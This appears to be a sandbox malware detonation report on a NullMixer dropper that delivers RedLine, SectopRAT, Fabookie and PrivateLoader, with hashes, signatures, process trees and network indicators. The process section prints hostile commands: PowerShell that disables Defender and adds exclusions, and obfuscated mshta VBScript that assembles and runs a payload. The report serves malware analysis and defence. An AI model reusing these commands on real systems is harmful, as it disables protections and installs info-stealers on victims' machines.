| SHA1 | 2e4c878492cb96b0e2cedbabaaaddf05399ebb8d |
| SHA256 | 14bf48a5c4f85aaade5008aaded3e8d98afa3e98aecca4b623d496d6f636a798 |
| SHA512 | 35d2b684791c2693dcb4598960270239762f7c927a782980efaa4ffc5806a07c514a112c7ae3a46c1fdb97a6b845f65dc29da606d92e07291354b8325ae08ba5 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir4384_756635860\ee05ed80-c056-44a0-bcbd-b5f79dec994f.tmp
| MD5 | da75bb05d10acc967eecaac040d3d733 |
| SHA1 | 95c08e067df713af8992db113f7e9aec84f17181 |
| SHA256 | 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2 |
| SHA512 | 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef |
memory/4308-414-0x00000000030D0000-0x0000000003162000-memory.dmp
memory/4308-415-0x0000000003170000-0x0000000003D6B000-memory.dmp
memory/4308-416-0x0000000003D70000-0x0000000003DFB000-memory.dmp
memory/4308-417-0x0000000003E00000-0x0000000003E87000-memory.dmp
memory/4308-420-0x0000000003E00000-0x0000000003E87000-memory.dmp
memory/4308-421-0x00000000032F0000-0x00000000032F1000-memory.dmp
memory/4308-422-0x00000000031F0000-0x00000000031F4000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | ab7697fe6ef9b6fad0f58069dde8a52d |
| SHA1 | c25082b8f75f49f4e229cc272a04455bfea6e4cf |
| SHA256 | e109080cf13b6692aa7f2ddc032c6a56020034f314a9cc192dffedbde22247dd |
| SHA512 | b24a53d7f14fcc920128b7d128336a9c4a1d0b3aa980bc06f7d07e059e144c65b5a8bbf275bbd3ef0878733d080975f206568ba5d45dfd37ba5359a95ad381c1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 2e1cdb10a291ce503d88dbec9957dece |
| SHA1 | 55a80b5e945353a628947fbfeecd17cce8ded83c |
| SHA256 | a2862149ed7ce96d678532d34e962add3a0a4fa17f4bce5923fadfa2350987f7 |
| SHA512 | 48b854d7defea2c96a38e8e8f2733dad5e6e66245b9df4b56bfdd736cf222ca61c14e0d00358adc563d25b432e2c6d39ab06066d9ad555523f3711d6a2c0fb23 |
memory/4308-461-0x000000006ED80000-0x000000006F004000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 57e61628672197287a3cf4b80f5f5436 |
| SHA1 | f8dae62974be4da2f839bd1df7e3e021b0141685 |
| SHA256 | afb8eac981cfc26a0bad639be0aa1fc4e4e48c0866b62a82f37054127ee21c1f |
| SHA512 | ae74830363b4733a542a6a55b0a4ab502b7a7b834cc5b1ff9379fccfba885b3911e9eea343909aae36c02cbd8e41795bec124d4d2e99bb231731826dc758e34a |
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1536 set thread context of 300 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe |
| PID 1424 set thread context of 980 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe
"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe
Wed062a0488e6dd1.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe
Wed0625413f2fb.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe
Wed067fa7edd4b875a.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe
Wed068cfd71e196da.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe
Wed06d8092a5ae.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe
Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe
Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe
Wed0639114ac9fa.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06384ea2548.exe
Wed06384ea2548.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe
Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 272
C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$7011C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF """"=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe
"C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp" /SL5="$4020C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"
C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe
05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /im "Wed062272ee8a02b1746.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h""=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h"=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT( "wScriPT.shEll" ). Run("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n " ,0, TrUe))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X+ SVnzW.C2+ AmtZY.zXT+ LPME79O.f1+ NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"
C:\Windows\SysWOW64\msiexec.exe
msiexec -y .\M9WDkH25.n
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 456
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mooorni.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | iplogger.org | udp |
| FR | 51.178.186.149:80 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| N/A | 127.0.0.1:49288 | tcp | |
| N/A | 127.0.0.1:49290 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | bc10ee7cbbf3ea8b505c94bd655f5e50 |
| SHA1 | 4667e7d52e54ba83ee7c264c14171a4db0d1c444 |
| SHA256 | 33ea6a4e83204a0798a7a4e6d3361618e171d37342ed1b16d33b504eafb3b111 |
| SHA512 | a1e2349e226e83fa041ca5ade434927c5ca2a7f4c3f322944cce829c7ae5aa47376b7a9825618d3393668751baa3b45be55c749625344764a2532e92a167815f |
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
| MD5 | 35799316b448a835e4784fbdd26b5648 |
| SHA1 | fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5 |
| SHA256 | 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0 |
| SHA512 | ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660 |
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/2804-64-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2804-75-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2804-81-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2804-80-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2804-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2804-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe
| MD5 | 508251b34a5ea5271e6c8d365b3623d2 |
| SHA1 | a6f057ba3154fca2a2000cbb7ee9c171c682a8ac |
| SHA256 | a111e371822094423c652cef67b75663d97e7d7a18c33213d745a1f2075d210f |
| SHA512 | 981e33ee2c1d699304165d7d96af3de99509b7dc0ce6f7a3e49c763f58ae4227f1d60056997adc366de9203d86d469de3062542b2ba147303848d6e4d26bf170 |
